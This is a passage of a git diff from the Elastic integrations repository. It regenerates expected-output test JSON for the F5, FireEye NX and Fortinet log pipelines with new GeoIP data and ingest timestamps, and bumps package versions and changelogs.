:atquo: umetMa: AD agent: Retrieving AAA server: ngelitse", "event": { - "ingested": "2021-06-09T10:31:52.609020200Z" + "ingested": "2021-12-14T14:42:51.960216368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 2019/10/18 03:14:14 tem very-high giatnula[71]: Rule: enimadmi \u003c\u003cqui\u003e: APM_EVENT=deny | aecon | sedq ***failure***", "event": { - "ingested": "2021-06-09T10:31:52.609023900Z" + "ingested": "2021-12-14T14:42:51.960216756Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2019/11/01 10:16:48 erc low tasnu: [syslog-ng]", "event": { - "ingested": "2021-06-09T10:31:52.609027800Z" + "ingested": "2021-12-14T14:42:51.960217140Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2019/11/15 17:19:22 ationevo very-high datatno[3538]: 01490019: :siar: orisnis: AD agent: Query: query with '(sAMAccountName=texp)' successful", "event": { - "ingested": "2021-06-09T10:31:52.609031600Z" + "ingested": "2021-12-14T14:42:51.960217539Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2019/11/30 00:21:57 pidat very-high sSMTP[6673]: ptateve", "event": { - "ingested": "2021-06-09T10:31:52.609035400Z" + "ingested": "2021-12-14T14:42:51.960217941Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 2019/12/14 07:24:31 olupta medium oremagn[2121]: 01490106: :itseddo: uptatev: AD module: authentication with 'oditem' failed in allow: Preauthentication failed, principal name: inimaven. failure olor", "event": { - "ingested": "2021-06-09T10:31:52.609039100Z" + "ingested": "2021-12-14T14:42:51.960218318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/f5/manifest.yml b/packages/f5/manifest.yml index 60aeb7cb523..21d900180eb 100644 --- a/packages/f5/manifest.yml +++ b/packages/f5/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: f5 title: F5 Logs -version: 0.7.0 +version: 0.7.1 description: Collect and parse logs from F5 devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/fireeye/changelog.yml b/packages/fireeye/changelog.yml index 6be6284a745..4aaf07cb89d 100644 --- a/packages/fireeye/changelog.yml +++ b/packages/fireeye/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.1.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json index 90943f549f8..269f4bfeda0 100644 --- a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json +++ b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log-expected.json @@ -1,6 +1,20 @@ { "expected": [ { + "observer": { + "product": "NX", + "vendor": "Fireeye" + }, + "@timestamp": "2020-09-22T08:34:44.991Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "fe80:0000:0000:0000:feec:daff:fe31:b706", + "ff02:0000:0000:0000:0000:0000:0000:0001" + ] + }, "fireeye": { "nx": { "flow_id": 721570461162990, @@ -28,6 +42,11 @@ "packets": 8, "ip": "fe80:0000:0000:0000:feec:daff:fe31:b706" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890344775Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.991339+0000\\\",\\\"flow_id\\\":721570461162990,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":45944,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:12.761326+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:12.761348+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"timeout\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":520,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], @@ -36,28 +55,23 @@ "community_id": "1:McNAQcsUcKZYOHHZYm0sD8JiBLc=", "transport": "udp", "iana_number": 17 - }, + } + }, + { "observer": { "product": "NX", "vendor": "Fireeye" }, - "@timestamp": "2020-09-22T08:34:44.991Z", + "@timestamp": "2020-09-22T08:34:44.993Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "fe80:0000:0000:0000:feec:daff:fe31:b706", - "ff02:0000:0000:0000:0000:0000:0000:0001" + "192.168.1.15", + "67.43.156.14" ] }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999899300Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.991339+0000\\\",\\\"flow_id\\\":721570461162990,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":45944,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:12.761326+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:12.761348+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"timeout\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":520,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" - } - }, - { "fireeye": { "nx": { "flow_id": 175370876476591, @@ -72,11 +86,23 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "port": 123, "bytes": 90, - "packets": 1, - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "packets": 1 }, "source": { "address": "192.168.1.15", @@ -85,6 +111,11 @@ "packets": 1, "ip": "192.168.1.15" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890347241Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993228+0000\\\",\\\"flow_id\\\":175370876476591,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":39808,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:33:15.122031+0000\\\",\\\"end\\\":\\\"2020-09-22T08:33:15.193693+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":475,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], @@ -93,7 +124,9 @@ "community_id": "1:RXq9OIqNb6ISMqP+R+uVnsOCMAc=", "transport": "udp", "iana_number": 17 - }, + } + }, + { "observer": { "product": "NX", "vendor": "Fireeye" @@ -104,17 +137,10 @@ }, "related": { "ip": [ - "192.168.1.15", - "67.43.156.14" + "fe80:0000:0000:0000:feec:daff:fe31:b706", + "ff02:0000:0000:0000:0000:0000:0000:0001" ] }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999903100Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993228+0000\\\",\\\"flow_id\\\":175370876476591,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":39808,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:33:15.122031+0000\\\",\\\"end\\\":\\\"2020-09-22T08:33:15.193693+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":475,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" - } - }, - { "fireeye": { "nx": { "flow_id": 1285126005631046, @@ -142,6 +168,11 @@ "packets": 8, "ip": "fe80:0000:0000:0000:feec:daff:fe31:b706" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890347696Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993227+0000\\\",\\\"flow_id\\\":1285126005631046,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":44535,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:22.763974+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:22.764073+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":522,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], @@ -150,7 +181,9 @@ "community_id": "1:99eFhjuGzHgOvXPRAgULIELViPs=", "transport": "udp", "iana_number": 17 - }, + } + }, + { "observer": { "product": "NX", "vendor": "Fireeye" @@ -161,17 +194,10 @@ }, "related": { "ip": [ - "fe80:0000:0000:0000:feec:daff:fe31:b706", - "ff02:0000:0000:0000:0000:0000:0000:0001" + "192.168.1.150", + "67.43.156.15" ] }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999909200Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993227+0000\\\",\\\"flow_id\\\":1285126005631046,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"fe80:0000:0000:0000:feec:daff:fe31:b706\\\",\\\"src_port\\\":44535,\\\"dest_ip\\\":\\\"ff02:0000:0000:0000:0000:0000:0000:0001\\\",\\\"dest_port\\\":10001,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tc\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":8,\\\"pkts_toclient\\\":0,\\\"bytes_toserver\\\":1680,\\\"bytes_toclient\\\":0,\\\"start\\\":\\\"2020-09-22T08:34:22.763974+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:22.764073+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"new\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":522,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" - } - }, - { "fireeye": { "nx": { "tcp": { @@ -195,11 +221,23 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.15", "port": 5938, "bytes": 59808, - "packets": 544, - "ip": "67.43.156.15" + "ip": "67.43.156.15", + "packets": 544 }, "source": { "address": "192.168.1.150", @@ -208,6 +246,11 @@ "packets": 799, "ip": "192.168.1.150" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890348089Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993286+0000\\\",\\\"flow_id\\\":222460015300681,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"src_port\\\":51082,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":5938,\\\"proto\\\":\\\"TCP\\\",\\\"proto_number\\\":6,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":799,\\\"pkts_toclient\\\":544,\\\"bytes_toserver\\\":69825,\\\"bytes_toclient\\\":59808,\\\"start\\\":\\\"2020-09-22T04:48:48.282697+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:36.067255+0000\\\",\\\"age\\\":13548,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false},\\\"tcp\\\":{\\\"tcp_flags\\\":\\\"1a\\\",\\\"tcp_flags_ts\\\":\\\"1a\\\",\\\"tcp_flags_tc\\\":\\\"1a\\\",\\\"syn\\\":true,\\\"psh\\\":true,\\\"ack\\\":true,\\\"state\\\":\\\"established\\\"}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":611,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], @@ -216,7 +259,9 @@ "community_id": "1:45/AGSM9JqMdS9WIK3bAZqim3A4=", "transport": "tcp", "iana_number": 6 - }, + } + }, + { "observer": { "product": "NX", "vendor": "Fireeye" @@ -227,17 +272,10 @@ }, "related": { "ip": [ - "192.168.1.150", - "67.43.156.15" + "192.168.1.15", + "67.43.156.14" ] }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999915900Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993286+0000\\\",\\\"flow_id\\\":222460015300681,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.150\\\",\\\"src_port\\\":51082,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":5938,\\\"proto\\\":\\\"TCP\\\",\\\"proto_number\\\":6,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":799,\\\"pkts_toclient\\\":544,\\\"bytes_toserver\\\":69825,\\\"bytes_toclient\\\":59808,\\\"start\\\":\\\"2020-09-22T04:48:48.282697+0000\\\",\\\"end\\\":\\\"2020-09-22T08:34:36.067255+0000\\\",\\\"age\\\":13548,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false},\\\"tcp\\\":{\\\"tcp_flags\\\":\\\"1a\\\",\\\"tcp_flags_ts\\\":\\\"1a\\\",\\\"tcp_flags_tc\\\":\\\"1a\\\",\\\"syn\\\":true,\\\"psh\\\":true,\\\"ack\\\":true,\\\"state\\\":\\\"established\\\"}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":611,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" - } - }, - { "fireeye": { "nx": { "flow_id": 1463569002949603, @@ -252,11 +290,23 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "port": 123, "bytes": 90, - "packets": 1, - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "packets": 1 }, "source": { "address": "192.168.1.15", @@ -265,6 +315,11 @@ "packets": 1, "ip": "192.168.1.15" }, + "event": { + "type": "flow", + "ingested": "2021-12-14T14:42:55.890348500Z", + "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993501+0000\\\",\\\"flow_id\\\":1463569002949603,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":52147,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:32:06.355299+0000\\\",\\\"end\\\":\\\"2020-09-22T08:32:06.439495+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":476,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" + }, "tags": [ "preserve_original_event" ], @@ -273,25 +328,6 @@ "community_id": "1:lPFhChZNfHDZ1i2YD0w8DBTTAf0=", "transport": "udp", "iana_number": 17 - }, - "observer": { - "product": "NX", - "vendor": "Fireeye" - }, - "@timestamp": "2020-09-22T08:34:44.993Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.15", - "67.43.156.14" - ] - }, - "event": { - "type": "flow", - "ingested": "2021-12-09T13:37:16.999921200Z", - "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-22T08:34:44.993501+0000\\\",\\\"flow_id\\\":1463569002949603,\\\"event_type\\\":\\\"flow\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"src_port\\\":52147,\\\"dest_ip\\\":\\\"67.43.156.14\\\",\\\"dest_port\\\":123,\\\"proto\\\":\\\"UDP\\\",\\\"proto_number\\\":17,\\\"ip_tos\\\":0,\\\"app_proto\\\":\\\"failed\\\",\\\"flow\\\":{\\\"pkts_toserver\\\":1,\\\"pkts_toclient\\\":1,\\\"bytes_toserver\\\":90,\\\"bytes_toclient\\\":90,\\\"start\\\":\\\"2020-09-22T08:32:06.355299+0000\\\",\\\"end\\\":\\\"2020-09-22T08:32:06.439495+0000\\\",\\\"age\\\":0,\\\"state\\\":\\\"established\\\",\\\"reason\\\":\\\"shutdown\\\",\\\"alerted\\\":false}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":476,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, { @@ -301,8 +337,20 @@ } }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 443, "ip": "67.43.156.13" }, "source": { @@ -397,7 +445,7 @@ }, "event": { "type": "tls", - "ingested": "2021-12-09T13:37:16.999927600Z", + "ingested": "2021-12-14T14:42:55.890348883Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:01.175635+0000\\\",\\\"flow_id\\\":1136872856843530,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"tls\\\",\\\"src_ip\\\":\\\"192.168.1.99\\\",\\\"src_port\\\":53918,\\\"dest_ip\\\":\\\"67.43.156.13\\\",\\\"dest_port\\\":443,\\\"proto\\\":\\\"TCP\\\",\\\"tls\\\":{\\\"subject\\\":\\\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\\\",\\\"issuerdn\\\":\\\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\\\",\\\"ja3\\\":{\\\"hash\\\":\\\"21536525fbf9e289f79e0f98af64bb59\\\",\\\"string\\\":\\\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\\\"},\\\"ja3s\\\":{\\\"hash\\\":\\\"9873b112313d7c4e5e8ef6207e6c6f0d\\\",\\\"string\\\":\\\"771,49195,0-65281-11-13172\\\"},\\\"fingerprint\\\":\\\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\\\",\\\"sni\\\":\\\"cloud.fireeye.com\\\",\\\"version\\\":\\\"TLS 1.2\\\",\\\"notbefore\\\":\\\"2020-07-01T00:00:00.000000+0000\\\",\\\"notafter\\\":\\\"2021-07-01T12:00:00.000000+0000\\\",\\\"client_ciphersuites\\\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\\\"client_tls_exts\\\":[0,11,10,13,15,13172],\\\"server_ciphersuite\\\":49195,\\\"server_tls_exts\\\":[0,65281,11,13172],\\\"pubkeylength\\\":65}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":1146,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } }, @@ -467,7 +515,7 @@ }, "event": { "type": "fileinfo", - "ingested": "2021-12-09T13:37:16.999933900Z", + "ingested": "2021-12-14T14:42:55.890349285Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:19.906154+0000\\\",\\\"flow_id\\\":1444203537876422,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"fileinfo\\\",\\\"src_ip\\\":\\\"192.168.1.222\\\",\\\"src_port\\\":47220,\\\"dest_ip\\\":\\\"192.168.100.31\\\",\\\"dest_port\\\":5601,\\\"proto\\\":\\\"TCP\\\",\\\"http\\\":{\\\"hostname\\\":\\\"192.168.100.31\\\",\\\"url\\\":\\\"\\\\/internal\\\\/search\\\\/es\\\",\\\"http_user_agent\\\":\\\"Mozilla\\\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\\\/537.36 (KHTML, like Gecko) Chrome\\\\/85.0.4183.102 Safari\\\\/537.36\\\",\\\"http_refer\\\":\\\"http:\\\\/\\\\/192.168.100.31:5601\\\\/app\\\\/kibana\\\",\\\"http_method\\\":\\\"POST\\\",\\\"protocol\\\":\\\"HTTP\\\\/1.1\\\",\\\"length\\\":0},\\\"app_proto\\\":\\\"http\\\",\\\"fileinfo\\\":{\\\"filename\\\":\\\"\\\\/internal\\\\/search\\\\/es\\\",\\\"magic\\\":\\\"ASCII text, with very long lines, with no line terminators\\\",\\\"state\\\":\\\"CLOSED\\\",\\\"md5\\\":\\\"548d03d3e11c009da833e6e59c4adfee\\\",\\\"stored\\\":false,\\\"size\\\":6394,\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":769,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" }, "user_agent": { @@ -491,8 +539,20 @@ } }, "destination": { - "port": 53, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.15", + "port": 53, "ip": "67.43.156.15" }, "dns": { @@ -535,7 +595,7 @@ }, "event": { "type": "dns", - "ingested": "2021-12-09T13:37:16.999940200Z", + "ingested": "2021-12-14T14:42:55.890349696Z", "original": "{\"rawmsg\":\"{\\\"timestamp\\\":\\\"2020-09-23T05:02:41.077232+0000\\\",\\\"flow_id\\\":206535698492848,\\\"iface\\\":\\\"pether3\\\",\\\"event_type\\\":\\\"dns\\\",\\\"src_ip\\\":\\\"192.168.1.176\\\",\\\"src_port\\\":60269,\\\"dest_ip\\\":\\\"67.43.156.15\\\",\\\"dest_port\\\":53,\\\"proto\\\":\\\"UDP\\\",\\\"dns\\\":{\\\"type\\\":\\\"query\\\",\\\"id\\\":28224,\\\"rrname\\\":\\\"time-ios.apple.com\\\",\\\"rrtype\\\":\\\"A\\\",\\\"tx_id\\\":0}}\\n\",\"meta_sip4\":\"192.168.1.99\",\"meta_oml\":289,\"deviceid\":\"860665216674\",\"meta_cbname\":\"fireeye-7e0de1\"}" } } diff --git a/packages/fireeye/manifest.yml b/packages/fireeye/manifest.yml index 25a739ab137..ee4b4a73a75 100644 --- a/packages/fireeye/manifest.yml +++ b/packages/fireeye/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: fireeye title: "Fireeye" -version: 1.1.1 +version: 1.1.2 license: basic description: "This Elastic integration collects Fireeye NX logs." type: integration diff --git a/packages/fortinet/changelog.yml b/packages/fortinet/changelog.yml index 2c7db9ccfeb..973d4e188d4 100644 --- a/packages/fortinet/changelog.yml +++ b/packages/fortinet/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json index 9d8f45c7cb2..5d33a04441a 100644 --- a/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 29 06:09:59 boNemoe4402.www.invalid proto=udp service=http status=deny src=10.150.92.220 dst=10.102.123.34 src_port=7178 dst_port=3994 server_app=reeufugi pid=7880 app_name=enderitq traff_direct=external block_count=5286 logon_user=sumdo@litesse6379.api.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.233978400Z" + "ingested": "2021-12-14T14:42:59.419338933Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 12 13:12:33 olupt4880.api.home proto=icmp service=https status=deny src=10.33.212.159 dst=10.149.203.46 src_port=2789 dst_port=5861 server_app=vol pid=4539 app_name=uidolor traff_direct=internal block_count=4402 logon_user=mipsumq@gnaali6189.internal.localhost msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.233988400Z" + "ingested": "2021-12-14T14:42:59.419341852Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 aqu1628.internal.domain proto=ipv6-icmp service=smtp status=deny src=10.173.116.41 dst=10.118.175.9 src_port=3710 dst_port=2802 server_app=aer pid=445 app_name=nse traff_direct=unknown block_count=7019 logon_user=uame@quis1130.internal.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.233993Z" + "ingested": "2021-12-14T14:42:59.419342312Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 12 03:17:42 tinculp2940.internal.local proto=ggp service=https status=deny src=10.134.137.177 dst=10.202.204.154 src_port=7868 dst_port=3587 server_app=amco pid=5712 app_name=psumquia traff_direct=unknown block_count=2458 logon_user=orsitame@reprehe189.internal.home msg=success", "event": { - "ingested": "2021-12-09T13:37:20.233998100Z" + "ingested": "2021-12-14T14:42:59.419342695Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 26 10:20:16 rad2103.api.domain proto=ipv6-icmp service=pop3 status=deny src=10.245.142.250 dst=10.70.0.60 src_port=5408 dst_port=4982 server_app=estqui pid=6557 app_name=magn traff_direct=inbound block_count=2638 logon_user=eos@enimad2283.internal.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234003800Z" + "ingested": "2021-12-14T14:42:59.419343075Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 9 17:22:51 